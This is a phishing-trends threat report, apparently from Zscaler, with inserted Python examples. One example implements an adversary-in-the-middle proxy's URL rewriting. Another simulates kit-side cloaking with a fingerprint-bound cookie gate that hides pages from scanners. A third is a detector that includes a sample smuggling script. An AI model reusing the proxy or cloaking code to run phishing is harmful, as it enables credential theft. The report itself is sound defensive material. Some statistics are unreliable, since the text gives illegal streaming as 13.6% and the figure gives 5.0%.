Zscaler ThreatLabz 2023 Phishing Report

The Zscaler ThreatLabz 2023 Phishing Report analyzed billions of daily transactions and found a 47.2% increase in phishing attempts in 2022 compared to 2021. The top targets were Microsoft brands like OneDrive and SharePoint, as well as Binance and illegal streaming services. The US, UK, Netherlands, Russia, and Canada saw the most attacks. Education replaced retail as the most targeted industry, seeing a 576% rise in attacks, likely related to student loan and debt relief scams. Healthcare also saw increased targeting as people resumed medical treatments post-pandemic.

© 2023 Zscaler, Inc. All rights reserved.


Contents
Executive Summary
Key Findings
Top Phishing Targets in 2022
Evolving Phishing Trends
Vishing Attacks
Recruitment Scams
Adversary-in-the-Middle (AiTM) Phishing Attacks
Browser-in-the-Browser (BiTB) Phishing Attacks
Using Legitimate Services to Host Phishing Websites
Phishing Using the InterPlanetary File System (IPFS)
Using WebSockets to Exfiltrate Fingerprinted Data
Using Web-Based Form Services to Collect Credentials
Phishing Using HTML Smuggling and SVG Files
Phishing Tools and Techniques
2024 Predictions
Improve Your Phishing Defenses
Best Practices: Security Awareness Training
Best Practices: Security Controls
Best Practices: How to Identify a Phishing Page
How the Zscaler Zero Trust Exchange Can Mitigate Phishing Attacks
Related Zscaler Products
About ThreatLabz
About Zscaler
Appendix
Categorizing Phishing Attacks
Top Phishing Scams

Executive Summary

Phishing scams are a growing threat, and cybercriminals' methods are becoming increasingly sophisticated, making them harder to detect and block. Analyzing 280 billion daily transactions and 8 billion daily blocked attacks over the course of 2022, the Zscaler ThreatLabz team saw a 47.2% surge in phishing attempts compared to 2021, an upward trend that is expected to continue in 2023.

The increased availability of phishing kits sourced from black markets and of chatbot AI tools like ChatGPT has let attackers quickly develop more targeted phishing campaigns. This improved targeting has simplified the process of manipulating users into taking actions that compromise their credentials, leaving them and their organizations vulnerable.

With the rise of AI and phishing-as-a-service offerings, it is easier than ever for cybercriminals to compromise institutions and access sensitive business, personal, and financial data for extortion. Although many of today's organizations have robust cybersecurity infrastructures, they must re-examine those infrastructures in light of today's trends and consider taking a zero trust approach.

This report will help you recognize the social engineering tactics and sophisticated coding used in phishing attacks, so you can prevent costly data breaches. Read on for an in-depth look at the latest phishing trends and observations the ThreatLabz team collected throughout the past year, and get best practices for safeguarding your organization against ever-evolving phishing techniques.
Key Findings in 2022

Phishing attacks rose 47.2% in 2022 compared to 2021.

Microsoft brands, including OneDrive and SharePoint, along with crypto exchange Binance and illegal streaming services, were targeted the most in 2022.

The United States, the United Kingdom, the Netherlands, Russia, and Canada were the top five most targeted countries.

Education was the most targeted industry, with attacks increasing by 576%, while last year's top target, retail and wholesale, dropped by 67%.

COVID-themed brand attacks accounted for 7.2% of phishing scams in 2021, but dropped to just 3.7% in 2022.

AI tools have significantly contributed to the growth of phishing, reducing the technical barriers to entry for criminals and saving them time and resources.

Attackers are evolving beyond SMS phishing (SMiShing) to voicemail-themed phishing (vishing) to lure victims into opening malicious attachments.

Sophisticated adversary-in-the-middle (AiTM) attacks are helping attackers bypass multifactor authentication (MFA).

Recruitment scams targeting job seekers are becoming more common.
Top Phishing Targets in 2022

Zscaler ThreatLabz analyzed data from across countries, industries, brands, and platforms to understand the most prevalent targets for phishing attacks in 2022.

2022 Phishing Attempts by Country

The top 10 countries targeted for phishing scams in the last year were:

1. United States
2. United Kingdom
3. Netherlands
4. Russia
5. Canada
6. Singapore
7. Germany
8. France
9. Japan
10. China

The US is once again the most targeted country for phishing attacks, a position it has held consistently. Our research indicates that more than 65% of all phishing attempts occurred in the US, an increase from last year's 60%. The UK experienced a 269% rise in phishing attacks.

Several countries saw phishing attempts increase in 2022, including Canada, which saw a staggering 718% increase. Some ThreatLabz experts attribute this spike to the parallel increase in attacks on the education sector. Russia saw a targeting increase of 198%, and Japan 92%. However, Hungary witnessed a significant 90% decline in phishing attacks, and Singapore's total went down by almost 48%.

The reduction in phishing attacks targeting Singapore may be due to its government's increased cybersecurity efforts, including initiatives by the country's Cyber Security Agency (CSA). This agency provides guidelines and advice to individuals and businesses on how to protect themselves from cyberthreats and, alongside the Personal Data Protection Commission (PDPC), enforces data protection laws and regulations.

Figure 1: Phishing attacks by country in 2022
2022 Phishing Attempts by Industry

The education industry experienced a 576% increase in phishing attempts in 2022, which propelled it from the eighth most-targeted sector to the first, surpassing last year's most-targeted industry, retail/wholesale. Phishing perpetrators likely capitalized on the student loan repayment and debt relief applications filed last year and exploited weaknesses in remote learning. Finance and insurance also saw phishing attempts increase by 273% in 2022.

Phishing attempts in the healthcare industry also rose sharply, from just under 31 million to over 114 million, roughly a 3.7x increase. Patients who deferred routine medical care during the initial year of the COVID-19 pandemic resumed their healthcare treatments in 2022, logging in to their online accounts and potentially interacting with phishing attackers impersonating healthcare organizations. Moreover, ransomware attackers are leveraging more phishing tactics to compromise healthcare organizations' data.

However, there was some respite from phishing attacks in 2022, with retail and wholesale experiencing a drop of 67% and services witnessing a decline of 38%. The decline in attacks on retail and wholesale is likely due to a downshift in consumer behavior after heavy online shopping and spending on goods in 2021.

Figure 2: Phishing attacks by industry in 2022
Most Imitated Brands in 2022 Phishing Attacks

Phishing attackers often exploit consumer trends by impersonating popular brands to deceive vulnerable consumers. The most frequently targeted brand categories include productivity tools, cryptocurrency sites, illegal streaming sites, social media platforms and messaging services, financial institutions, government sites, and logistics services.

Microsoft was once again the most imitated brand of the year, accounting for just under 31% of attacks. Its OneDrive brand accounted for another 17%, SharePoint nearly 4%, and Microsoft 365 another 1.7%. In 2022, Zscaler found that attackers increasingly used OneNote, which can be integrated with OneDrive and other Microsoft products, to deliver malware via phishing emails. Previously, threat actors targeted users with malicious macro-enabled documents, but in July 2022 Microsoft finished rolling out a change that blocks VBA macros by default in Office files downloaded from the internet (files carrying the Mark of the Web), making that approach less reliable for distributing malware.

Cryptocurrency exchange Binance accounted for 17% of imitated brand attacks, with phishers posing as fake customer representatives from banks or P2P companies. Illegal streaming sites accounted for 13.6% of attacks, with spikes during significant sporting events such as the FIFA World Cup in November and December of 2022.

While COVID-themed attacks are still prevalent, they are on the decline. In 2021, COVID-themed brand attacks accounted for 7.2% of phishing scams, and they dropped to just 3.7% in 2022.

The 20 most imitated brands, products, and services in 2022 phishing attacks are:

1. Microsoft
2. OneDrive
3. Binance
4. Illegal streaming sites
5. SharePoint
6. COVID-19 relief
7. Government
8. Netflix
9. Facebook
10. Microsoft 365
11. Google
12. Telegram
13. Adobe
14. DHL
15. Amazon
16. American Express
17. WhatsApp
18. Roblox
19. PayPal
20. DocuSign

Figure 3: Brands most imitated in phishing attacks (share of brand-imitation attacks)
Microsoft 30.8%
OneDrive 17.4%
Binance 17.4%
Illegal streaming 5.0%
SharePoint 3.8%
COVID-19 3.7%
Government 2.8%
Netflix 2.1%
Facebook 1.8%
Microsoft Office 365 1.7%
Google 1.3%
Telegram 1.3%
2022 Top Referring Domains

Attackers often use trusted domains to manipulate victims, redirecting them to phishing websites. They may buy advertisements on media outlets or search platforms like Google and Bing. They may also post in corporate forums and marketplaces such as Walmart and Amazon, or abuse sharing sites and services such as Evernote, Dropbox, and GitHub.

We analyzed referring domains to determine which ones attackers exploit the most. In 2022, these included video streaming sites, crypto exchanges and other financial sites, website and form builders, sites that host user-generated content, search engines, and more.

The top 20 referring domains in 2022 were:

1. qumucloud.com
2. vimeo.com
3. bittrex-appemail.com
4. bittrex-global-email-i.com
5. googlesyndication.com
6. typeform.com
7. mhtestd.gov.zw
8. gutefrage.net
9. dow.com
10. framer.com
11. google.com
12. finanznachrichten.de
13. holdingsglobaloverviewmarketcap.com
14. hesgoal.com
15. doubleclick.net
16. elonshib.net
17. myftp.biz
18. principal.com
19. marathonbet.ru
20. baidu.com

Figure 4: Most common referring domains used in 2022 phishing attacks (share of referrals)
qumucloud.com 27.0%
vimeo.com 16.3%
bittrex-appemail.com 11.6%
bittrex-global-email-i.com 6.8%
googlesyndication.com 6.3%
typeform.com 5.7%
mhtestd.gov.zw 5.0%
gutefrage.net 3.6%
dow.com 3.5%
framer.com 3.1%
google.com 2.1%
finanznachrichten.de 1.4%
holdingsglobaloverviewmarketcap.com 1.3%
hesgoal.com 1.1%
doubleclick.net 1.0%
elonshib.net 0.9%
myftp.biz 0.9%
principal.com 0.9%
Evolving Phishing Trends

Autonomous System Attacks in 2022

An autonomous system (AS) is a network or group of networks under a single routing policy. Each AS has a unique numeric identifier, the autonomous system number (ASN). As part of this analysis, the Zscaler ThreatLabz team reviewed the ASNs responsible for hosting phishing infrastructure and classified each by the type of operator: hosting providers, ISPs, or business (enterprise) networks.

Our analysis showed that in 2022, 39% of phishing attacks were hosted on hosting provider networks (down from 50.6% in 2021), 53% on ISP networks (up from 39.2% in 2021), and 8% on business networks.

Figure 5: ASNs for phishing infrastructure, by operator type
hosting 39.0%
isp 53.0%
business 8.0%
Each year, threat actors employ more sophisticated tactics and increasingly advanced approaches to execute their phishing scams. To ensure your organization is prepared and your team remains ahead of attacks, staying informed of the latest threat trends is essential. The following are the key takeaways from the phishing trends observed in 2022.

Vishing Attacks

Vishing attacks, as the term is used in this report, are voicemail-themed phishing campaigns that lure victims into opening malicious attachments. In mid-2022, threat actors targeted users from various US-based organizations with malicious voicemail-notification-themed emails to steal their Microsoft 365 and Outlook credentials.

We also observed phishing campaigns with voicemail-themed email attachments like this:

Figure 6: Vishing campaign email

The .html attachment contains obfuscated JavaScript:

Figure 7: Vishing campaign email code with hidden JavaScript

Deobfuscating the code shows that if a user were to open the file, it would redirect them to an attacker-controlled server:

Figure 8: Vishing campaign email code with hidden JavaScript revealed
This leads to a Microsoft phishing page:

Figure 9: Vishing campaign landing page

ThreatLabz also uncovered a voice-call scam in which a threat actor targets a corporate employee by impersonating a manager. Initially, the victim receives a spoofed phone call with a prerecorded "hello" message, and then the call terminates. Subsequently, the victim receives a message from the scammer indicating the manager is having network connectivity issues and requesting that communication continue through messaging. The scammer then attempts to coax the victim into divulging corporate account information or transferring funds.

Figure 10: Vishing messaging

To avoid falling into attackers' traps, it is crucial to educate employees to communicate with each other only through official channels, to verify unexpected requests for credentials or payments by calling the requester back on a known number, and to stay vigilant about such scams.
Recruitment Scams

During 2022, ThreatLabz witnessed an increase in employment scams targeting job seekers. These scams used fabricated job postings, websites or portals, and forms to lure individuals seeking employment.

Once the victim applied for the job, the attacker would communicate with them and request a Skype interview in which the attacker would impersonate an HR representative.

Here, the attacker posted a fake LinkedIn advertisement with a phishing URL. Visiting the fake URL would let potential victims apply for the job.

Figure 11: Fake LinkedIn advertisement with a phishing URL

Figure 12: Fake recruitment email

In examining the source code, you can see code used for exfiltrating credit card data.

Figure 13: Fake recruitment email source code
Adversary-in-the-Middle (AiTM) Phishing Attacks

The ThreatLabz team discovered a new strain of a large-scale phishing campaign that uses AiTM techniques along with several evasion tactics. Traditional phishing websites that collect user credentials never complete the authentication process with the actual mail provider's server. If the user has enabled MFA, the attacker cannot log in to the account with only the stolen credentials. To bypass MFA, attackers may use AiTM phishing attacks.

An AiTM phishing server is a malicious reverse proxy: it relays the victim's requests to the legitimate login service and the service's responses back to the victim, rewriting the URLs in each legitimate page to point at attacker-controlled URLs (see figure 15). The victim completes the real login, including the MFA step, through the proxy, and the attacker captures the authenticated session cookie the service returns, which can then be replayed without the password or a second factor.

Figure 14 shows a code snippet of a phishing page served by an AiTM phishing server.

Figure 14: Phishing page code served by AiTM phishing server

Figure 15: Attacker-controlled URLs modified by AiTM proxy server

In the rewritten URLs, the original subdomain (in green), the original domain name (in blue, minus the TLD), and a unique generated ID (in pink) are joined together with dashes and become a single subdomain label under the phishing site's domain (in orange).

We detected this when some of the requests were passed to the victim with incorrect modifications, as seen in figure 16.

Figure 16: Incorrect modifications passed to phishing victim

This resulted in a leak of the attacker-controlled server address, as shown in figure 17.

Figure 17: Attacker-controlled server address revealed
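The rewriting rule described above, as an added example that is not from the report or from any phishing kit: a Python script that builds the dash-joined relay hostname from a target hostname and rewrites absolute URLs in a relayed page the same way, together with a detection check that flags hostnames whose first label follows the pattern. The phishing domain phish.example, the brand list, and the session ID format are assumptions.

```python
"""Added example, not code from the report or from any phishing kit: the URL
rewriting an AiTM reverse proxy performs, using the label scheme the report
observed (original subdomain, original domain minus TLD, generated ID, joined
with dashes under the phishing domain), plus a detection check for that
pattern. The phishing domain, the brand list and the ID format are assumptions.
"""
import re
import secrets
from urllib.parse import urlsplit, urlunsplit

PHISH_DOMAIN = "phish.example"  # assumed attacker-controlled apex domain

# Registrable names of login services a proxy would relay (assumed list).
BRAND_DOMAINS = {"microsoftonline", "office", "live", "okta", "google"}


def split_host(host):
    """'login.microsoftonline.com' -> ('login', 'microsoftonline', 'com').

    Simplification: the last label is taken as the TLD, which is wrong for
    multi-label suffixes such as .co.uk; a real tool would use the Public
    Suffix List.
    """
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        raise ValueError(f"not a registrable host: {host!r}")
    return ".".join(labels[:-2]), labels[-2], labels[-1]


def new_session_id():
    """Per-victim ID that becomes the last dash-separated component."""
    return secrets.token_hex(4)


def proxy_host_for(target_host, session_id):
    """Relay hostname for one legitimate host.

    login.microsoftonline.com with ID a1b2 -> login-microsoftonline-a1b2.phish.example
    Dots in a multi-label subdomain are flattened to dashes as well.
    """
    sub, domain, _tld = split_host(target_host)
    parts = [p for p in (sub.replace(".", "-"), domain, session_id) if p]
    return "-".join(parts) + "." + PHISH_DOMAIN


def rewrite_url(url, session_id):
    """Point an absolute URL at the proxy so the victim never leaves it."""
    s = urlsplit(url)
    if not s.hostname:
        return url  # relative URL: already resolves against the proxy host
    return urlunsplit((s.scheme, proxy_host_for(s.hostname, session_id),
                       s.path, s.query, s.fragment))


_ATTR_URL = re.compile(r'(?P<attr>\b(?:href|src|action)=")(?P<url>https?://[^"]+)"')


def rewrite_html(html, session_id):
    """Rewrite absolute href/src/action URLs in a page relayed from the real service."""
    return _ATTR_URL.sub(
        lambda m: m.group("attr") + rewrite_url(m.group("url"), session_id) + '"', html)


# ---- detection side: does a hostname's first label look like <sub>-<brand>-<id>? ----
_AITM_LABEL = re.compile(r"^(?P<sub>[a-z0-9-]+?)-(?P<brand>[a-z0-9]+)-(?P<id>[a-z0-9]{4,})$")


def looks_like_aitm_host(host):
    """True when the left-most label matches the pattern and names a known brand.

    Hosts such as mail-archive-2024.example.org fit the shape but are not
    flagged because 'archive' is not in BRAND_DOMAINS.
    """
    m = _AITM_LABEL.match(host.lower().split(".")[0])
    return bool(m) and m.group("brand") in BRAND_DOMAINS


if __name__ == "__main__":
    sid = new_session_id()
    page = '<form action="https://login.microsoftonline.com/common/login">'
    print(rewrite_html(page, sid))
    print(looks_like_aitm_host(proxy_host_for("login.microsoftonline.com", sid)))
```

Feed each requested hostname from proxy or DNS logs to looks_like_aitm_host() to hunt for this kit family; the brand list is the part that needs maintaining. The TLD handling is deliberately naive, so a production version should use the Public Suffix List.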
Browser-in-the-Browser (BiTB) Phishing Attacks

BiTB phishing attacks also saw increased use in 2022. They simulate a login pop-up window within a main phishing page, leading the intended target to believe they need to enter their single sign-on (SSO) credentials to continue using the website.

Attackers use a combination of basic HTML/CSS and an inline frame (iframe) to craft a fake pop-up window that simulates the user's typical SSO pop-up, complete with a fake address bar showing the legitimate provider's URL. It can be almost impossible for a user to distinguish a genuine pop-up from a well-designed phishing fake by appearance alone. One reliable check: a real SSO pop-up is a separate browser window and can be dragged outside the boundary of the page that opened it, whereas the BiTB fake is drawn inside the page and cannot leave it.

Figure 18 shows an example of a BiTB attack using a fake SSO window, generated using HTML, to target Steam, a popular digital gaming platform.

Figure 18: BiTB or "picture-in-picture" attack
Using Legitimate Services to Host Phishing Websites

The ThreatLabz team also observed attackers using legitimate hosting services to host phishing sites. These included free hosting providers such as 00webhostapp.com, file sharing services such as transfer.sh, cloud service providers such as amazonaws.com, and URL shortening through services such as linkedin.com.

In 2022, the team also observed attackers using dynamic DNS services, which let users map a domain name to a changing IP address. Users primarily leverage these services for remote access or for hosting websites on home networks. Attackers can also use dynamic DNS services to host phishing websites on compromised computers or servers without fixed IP addresses.

Figure 19: Dynamic DNS subdomains for phishing page hosting (example one)

Figure 20: Dynamic DNS subdomains for phishing page hosting (example two)

Figure 21: T&T phishing hosted using dynamic DNS
Phishing Using the InterPlanetary File System (IPFS)

IPFS is a distributed peer-to-peer file system that allows users to store and share files on a decentralized network of computers. Compared to traditional centralized file systems, it provides a more resilient way of storing and distributing files: files are divided into smaller chunks and distributed across multiple nodes in the network, so there is no single point of failure. Content is addressed by a content identifier (CID) derived from the data itself, and public HTTP gateways expose it at paths such as /ipfs/<CID>. Figure 22 shows what IPFS phishing looks like.

Figure 22: IPFS phishing example

Because of its peer-to-peer construction, it is much more difficult to remove an IPFS-hosted phishing page than one hosted using a more traditional method: a takedown at one gateway leaves the same CID reachable through every other gateway and through any node pinning the content.

We also observed attackers using Google Translate to make their URLs appear legitimate. Google Translate serves a translated copy of an arbitrary page from a translate.goog subdomain, so the phishing page is delivered from a Google-owned host.

Figure 23: IPFS phishing example leveraging Google Translate

As shown in figure 23, attackers used Google Translate on an IPFS-hosted phishing site, and then used the page to phish DocuSign credentials.
Using WebSockets to Exfiltrate Fingerprinted Data

In the Zscaler ThreatLabz 2022 Phishing Report, we discussed phishing kits and open source phishing frameworks. These kits and frameworks package up and commoditize the tools required to quickly launch hundreds or thousands of convincing and effective phishing pages, even if the attackers have little technical skill.

Some of these phishing kits have a feature called "cloaking," a technique that lets phishers hide the actual phishing webpage from security researchers and scanners while still serving it to their victims. The phishing kit filters each visitor's connection based on IP address, hostname keywords, user agent, and more. Based on the match, it serves either a benign page or the phishing page, avoiding detection by security researchers and anti-phishing tools that scan the internet for malicious content.

This year, we observed a new feature in client fingerprinting. Here is what happens when a visitor lands on, and is fingerprinted by, a phishing page:

1. The user browses to the phishing page.
2. The server returns JavaScript that fingerprints the client, and the JavaScript uploads the fingerprint over a WebSocket connection.
3. The server generates a cookie based on the fingerprint and sends the cookie back over the WebSocket.
4. The JavaScript automatically refreshes the page with the cookie set.
5. The user is redirected to the phishing page if the cookie passes the check.

The fingerprinting JavaScript is based on an open source fingerprinting project hosted on GitHub.

Figure 24: Fingerprint data of a machine

This technique can be disrupted by monitoring WebSocket communication and filtering fingerprint data. Note the flip side for detection: a scanner that does not execute the JavaScript or complete the WebSocket exchange never receives the cookie and sees only the benign page, so analysis sandboxes must run the page in a real browser and let the WebSocket upload complete to reach the phishing content. The phishing kit can also set up command-and-control (C2) communication to receive commands from phishing servers over the WebSocket, using a technique referred to as heartbeat communication, in which the attacker sends and receives data back and forth with the victim's device.

Figure 25: Example of heartbeat communication
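The five-step gate above, simulated in Python as an added example (not the kit's own code) that also covers the IP, hostname and user agent cloaking filter described at the start of this section and the region-based cloaking mentioned later under Phishing Tools and Techniques: the server side decides, for each visitor, whether to serve the benign page or the phishing page. The secret key, blocklists, required fingerprint fields, and sample visitors are constructed for the demonstration.

```python
"""Added example (not the phishing kit's own code): the server side of the
fingerprint-then-cookie gate the report describes, plus the classic
IP/hostname/user agent cloaking filter. Everything here is constructed for
illustration: the secret, the blocklists and the sample visitors are assumptions.
"""
import hmac
import hashlib
import ipaddress
import json

SERVER_SECRET = b"assumed-kit-secret"  # per-campaign key, assumption

# Cloaking rules a kit might ship with (assumed values; 203.0.113.0/24 is TEST-NET-3).
BLOCKED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]
BLOCKED_HOSTNAME_KEYWORDS = ("crawl", "scanner", "virustotal", "amazonaws")
BLOCKED_UA_KEYWORDS = ("bot", "curl", "python-requests", "headless")

# Fingerprint fields the client-side script is expected to send (assumed set).
REQUIRED_FIELDS = ("userAgent", "language", "screen", "timezone", "platform")


def cloak_decision(ip, reverse_hostname, user_agent):
    """Step 0: classic cloaking. 'benign' for suspected scanners, else 'continue'."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in BLOCKED_NETWORKS):
        return "benign"
    rh, ua = reverse_hostname.lower(), user_agent.lower()
    if any(k in rh for k in BLOCKED_HOSTNAME_KEYWORDS) or any(k in ua for k in BLOCKED_UA_KEYWORDS):
        return "benign"
    return "continue"


def canonical_fingerprint(fp):
    """Canonical JSON of the keyed fields, so the same client always hashes the same."""
    subset = {k: fp.get(k) for k in REQUIRED_FIELDS}
    return json.dumps(subset, sort_keys=True, separators=(",", ":")).encode()


def issue_cookie(fp):
    """Step 3: the WebSocket handler receives the fingerprint and returns a cookie.

    Returns None if the fingerprint is incomplete, which is typical of a
    headless scanner that did not run the fingerprinting script.
    """
    if any(not fp.get(k) for k in REQUIRED_FIELDS):
        return None
    return hmac.new(SERVER_SECRET, canonical_fingerprint(fp), hashlib.sha256).hexdigest()


def serve_after_refresh(cookie, fp):
    """Step 5: on the refreshed request, decide which page to serve.

    The cookie must be the HMAC of the fingerprint presented now, so a cookie
    copied out of one browser is useless from another.
    """
    if not cookie:
        return "benign"
    expected = issue_cookie(fp)
    if expected is None or not hmac.compare_digest(cookie, expected):
        return "benign"
    return "phishing"


def simulate_visit(ip, reverse_hostname, user_agent, fp):
    """Run the whole flow for one visitor; returns the page finally served."""
    if cloak_decision(ip, reverse_hostname, user_agent) == "benign":
        return "benign"
    cookie = issue_cookie(fp)                 # steps 2-3: fingerprint uploaded over WebSocket
    return serve_after_refresh(cookie, fp)    # steps 4-5: page refresh carrying the cookie


# Constructed sample visitors.
VICTIM = dict(ip="198.51.100.7", reverse_hostname="cpe-198-51-100-7.isp.example",
              user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/110.0",
              fp={"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/110.0",
                  "language": "en-US", "screen": "1920x1080",
                  "timezone": "America/New_York", "platform": "Win32"})
SCANNER = dict(ip="203.0.113.9", reverse_hostname="crawler-9.scanner.example",
               user_agent="python-requests/2.28", fp={})
HEADLESS = dict(ip="198.51.100.8", reverse_hostname="ec2-host.example",
                user_agent="Mozilla/5.0 HeadlessChrome/110.0", fp={"userAgent": "x"})

if __name__ == "__main__":
    for name, v in (("victim", VICTIM), ("scanner", SCANNER), ("headless", HEADLESS)):
        print(name, "->", simulate_visit(**v))
```

The HMAC binds the cookie to the fingerprint, which is why replaying a captured cookie from an analysis VM with a different screen size or time zone still yields the benign page; an analyst who wants the phishing page has to reproduce the victim's environment or let the real fingerprint script run.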
Using Web-Based Form Services to Collect Credentials

We also observed attackers abusing services that help users collect information via forms. For example, FormSubmit is a web-based service that provides a simple way to set up and manage HTML forms for websites. Organizations can use it to create custom forms with various input fields, such as text boxes, checkboxes, radio buttons, dropdown lists, and file uploads, and then have the form data delivered to a specified email address or webhook URL.

The example in figure 26 demonstrates how threat actors can abuse form creation services to collect credentials without setting up their own servers: the page is plain HTML, and the credentials are delivered to the attacker by the service.

Figure 26: Form example

The "action" attribute of the form is "https://submit-form[.]com/Qz1kGknr", so the browser posts the credentials directly to the form service's endpoint.

Figure 27: How the attacker leverages the form service to intercept information
Phishing Using HTML Smuggling and SVG Files

HTML smuggling is a technique that allows attackers to bypass network security controls by embedding a malicious payload, typically encoded, inside an apparently benign HTML file and reconstructing it on the target system. JavaScript in the page decodes the payload in the browser, wraps it in a Blob, and triggers a download, so the malicious file is assembled on the endpoint rather than crossing the network as a file that a gateway could inspect. Because detection schemes often scan and detect JavaScript in HTML, threat actors turn to variations of HTML smuggling to deliver various types of malware.

Attackers often move HTML smuggling code into Scalable Vector Graphics (SVG) files. SVG is an XML-based vector graphics format used to create two-dimensional graphics that can be scaled without losing resolution; SVG files can be edited with text editors and graphics software.

JavaScript is a legitimate part of SVG: it can manipulate SVG elements and attributes to create animations, such as moving objects, changing colors, and creating transitions, and can make those animations interactive. A script element inside an SVG file runs when the file is opened in a browser, just as it would in an HTML page.

Detection solutions don't typically check JavaScript inside SVG, making it an attractive option for attackers.
Phishing Tools and Techniques

There are several standalone applications and browser extensions available online that threat actors use to copy a legitimate website and then modify the page to add data exfiltration code. Some examples:

• HTTrack, a widely used standalone application
• SingleFile, a Google Chrome extension
• WebScrapBook, an open source browser extension
• Save Page WE, a Google Chrome extension

Phishing Using iframes

An iframe is an HTML element that allows web developers to embed another HTML document within the current web page. It creates a "frame within a frame" in which the content of the embedded document displays in a rectangular box on the current page. When threat actors embed phishing content in an iframe, they may evade detection, because a scanner that inspects only the outer page never sees the credential form.

An iframe can be used for phishing in a few different ways:

1. Nested iframe
2. iframe as background
3. iframe as foreground, as in BiTB

To add to these, we expect "iframes as components" to begin to appear, too. In this method, several iframes are combined to generate a phishing page, with each iframe supplying part of the page. For example, the first iframe is used to collect a username (figure 28):

Figure 28: Username-collecting iframe

The second iframe is used to collect a password (figure 29):

Figure 29: Password-collecting iframe

Finally, the phishing page combines the two iframes (figure 30):

Figure 30: Phishing page with combined iframes
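A static triage pass covering three patterns from this section and the two before it (a page assembled from several iframes, a form posting to a third-party form-collection service, and script inside SVG using the Blob/atob download combination typical of HTML smuggling), written here as an added Python example rather than taken from the report. The list of form-service hosts and the sample page are constructed; the form path abc123 is a placeholder, not the identifier from figure 27.

```python
"""Added example (not from the report): a static triage pass over an HTML page
that flags a form whose action posts to a third-party form-collection service,
a page assembled from several iframes, script embedded inside SVG, and the
Blob/atob/download combination typical of HTML smuggling. The form-service
host list and the sample page below are constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts of form-collection services; an assumed list for the demo.
FORM_SERVICE_HOSTS = {"submit-form.com", "formsubmit.co", "formspree.io"}

# JavaScript fragments that together indicate a payload assembled in the browser.
SMUGGLING_TOKENS = ("atob(", "new Blob(", "createObjectURL(", "msSaveOrOpenBlob")


class PhishTriage(HTMLParser):
    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.iframe_srcs = []
        self.svg_depth = 0
        self.script_in_svg = 0
        self.in_script = False
        self.scripts = []
        self.download_links = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "iframe":
            # srcdoc iframes carry inline HTML instead of a URL
            self.iframe_srcs.append(a.get("src") or ("srcdoc:" if "srcdoc" in a else ""))
        elif tag == "svg":
            self.svg_depth += 1
        elif tag == "script":
            self.in_script = True
            if self.svg_depth:
                self.script_in_svg += 1
        elif tag == "a" and "download" in a:
            self.download_links += 1

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, including inside <svg>
        if self.in_script:
            self.scripts.append(data)


def triage(html):
    """Return a dict of findings; an empty dict means nothing suspicious was seen."""
    p = PhishTriage()
    p.feed(html)
    p.close()
    findings = {}
    svc = [u for u in p.form_actions if (urlsplit(u).hostname or "").lower() in FORM_SERVICE_HOSTS]
    if svc:
        findings["form_service_action"] = svc
    if len(p.iframe_srcs) >= 2:
        findings["iframe_components"] = p.iframe_srcs
    if p.script_in_svg:
        findings["script_in_svg"] = p.script_in_svg
    js = "".join(p.scripts)
    hits = [t for t in SMUG_TOKENS_IN(js)]
    if hits and (p.download_links or "download" in js):
        findings["html_smuggling"] = hits
    return findings


def SMUG_TOKENS_IN(js):
    """Tokens from SMUGGLING_TOKENS present in the concatenated script text."""
    return [t for t in SMUGGLING_TOKENS if t in js]


# Constructed sample page combining the three patterns (placeholder form path).
SAMPLE = """<html><body>
<form action="https://submit-form.com/abc123" method="post">
  <input name="email"><input name="password" type="password"></form>
<iframe src="https://cdn.example/user.html"></iframe>
<iframe src="https://cdn.example/pass.html"></iframe>
<svg xmlns="http://www.w3.org/2000/svg"><script>
  var b = new Blob([Uint8Array.from(atob("TVqQ"), c => c.charCodeAt(0))]);
  var a = document.createElement("a"); a.href = URL.createObjectURL(b);
  a.download = "invoice.iso"; a.click();
</script></svg>
</body></html>"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it over attachments and landing pages pulled from mail or proxy quarantine; any non-empty result is worth a closer look, and the iframe list in particular shows what a sandbox that renders only the outer document would have missed.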
WebAssembly Phishing

WebAssembly is a binary instruction format for a virtual machine that runs in modern web browsers. It provides a portable, low-level bytecode format that can be executed at near-native speed, making it well-suited to running performance-critical applications on the web. WebAssembly addresses the limitations of JavaScript as a performance language for web applications; its code can be written in various languages, such as C++, Rust, and Go, and then compiled to the WebAssembly bytecode format. For a phishing page, the attraction is that logic moved into a WebAssembly module ships as bytecode rather than as readable JavaScript, so detection that relies on inspecting script source has nothing to match.

Phishing Based on Geographic Region

Threat actors wanting to target users who are in specific regions or speak specific languages may turn to third-party APIs and specialized services to identify those audiences.

Geo Targetly is a service that allows users to personalize their website content based on visitors' geographic location. To determine display content, they can create custom rules based on factors like IP addresses, language settings, and time zones. Unsurprisingly, attackers use this service as a cloaking technique when phishing, showing the phishing page only to visitors in the targeted region and a benign page to everyone else.

Using Punycode or a Nonstandard IP Address in URLs to Avoid Detection

Punycode is the ASCII encoding used for internationalized domain names; a label that contains non-ASCII characters is transmitted as an "xn--" label. A look-alike hostname built from, for example, Cyrillic letters can render in the address bar as a trusted brand while its real form is an xn-- label, and a blocklist that matches only on the rendered name misses it.

An IPv4 address is a 32-bit number that browsers will accept in several spellings. The standard form has four dotted parts, but one-, two-, and three-part forms are also valid (the last part fills the remaining bytes), and each part can be written in decimal, octal (leading 0), or hexadecimal (leading 0x), so http://0x7f.1/ and http://2130706433/ both resolve to 127.0.0.1. When phishing attackers represent an IP address in a nonstandard way, it may evade detection, but this can be mitigated by normalizing IP addresses to dotted-decimal form before matching.

Phishing Using "Hash in URL"

The "hash" in a URL refers to the portion of the URL that comes after the "#" symbol. Also known as the fragment identifier, it identifies a specific section within a web page, such as a section heading or a paragraph, and allows a user to navigate to that section directly by clicking on a link or bookmark.

